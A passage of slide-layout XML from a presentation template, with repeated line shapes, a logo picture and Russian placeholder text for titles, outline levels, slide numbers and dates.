        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="105" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="8228880" cy="397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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{22572BE9-DAF6-4CF6-829B-DD3DCB4EA77E}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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7" r:id="rId3"/>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2" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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113" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="115" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="31"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{952C72B1-5E3D-4053-882A-91274DAABD73}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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9" r:id="rId3"/>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8" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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119" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="121" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="221040"/>
            <a:ext cx="8228880" cy="124992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Для правки текста заглавия щёлкните мышью</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4674240" y="1604520"/>
            <a:ext cx="4015440" cy="3976920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="0" rIns="0" tIns="0" bIns="0" anchor="t">
            <a:normAutofit fontScale="93333" lnSpcReduction="1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Для правки структуры щёлкните мышью</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Второй уровень структуры</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Третий уровень структуры</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Четвёртый уровень структуры</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Пятый уровень структуры</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Шестой уровень структуры</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Седьмой уровень структуры</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="33"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{9214DEBE-D5AF-414E-B1E1-98E5ADC63804}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="PlaceHolder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="34"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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1" r:id="rId3"/>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0" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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131" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="-43200" bIns="-43200" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="133" name="Picture 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7786800" y="214200"/>
            <a:ext cx="1255320" cy="1188360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="35"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6553080" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="46800" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
              <a:defRPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="216000" indent="-214200" algn="r" defTabSz="449280">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:fld id="{D6D349F3-56EE-4C26-9E3B-DC878F65C360}" type="slidenum">
              <a:rPr b="0" lang="ru-RU" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&lt;номер&gt;</a:t>
            </a:fld>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" idx="36"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6248520"/>
            <a:ext cx="2128320" cy="451800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="1" spcCol="0" lIns="90000" rIns="90000" tIns="46800" bIns="4680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3" r:id="rId3"/>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6" name="Text Box 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124080" y="6248520"/>
            <a:ext cx="2893320" cy="4550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137" name="Line 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7596000" y="166680"/>
            <a:ext cx="1440" cy="1245960"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="90000" rIns="90000" tIns="45000" bIns="45000" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Line 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="468000" y="1412640"/>
            <a:ext cx="7128000" cy="1800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="sq" w="12600">
            <a:solidFill>
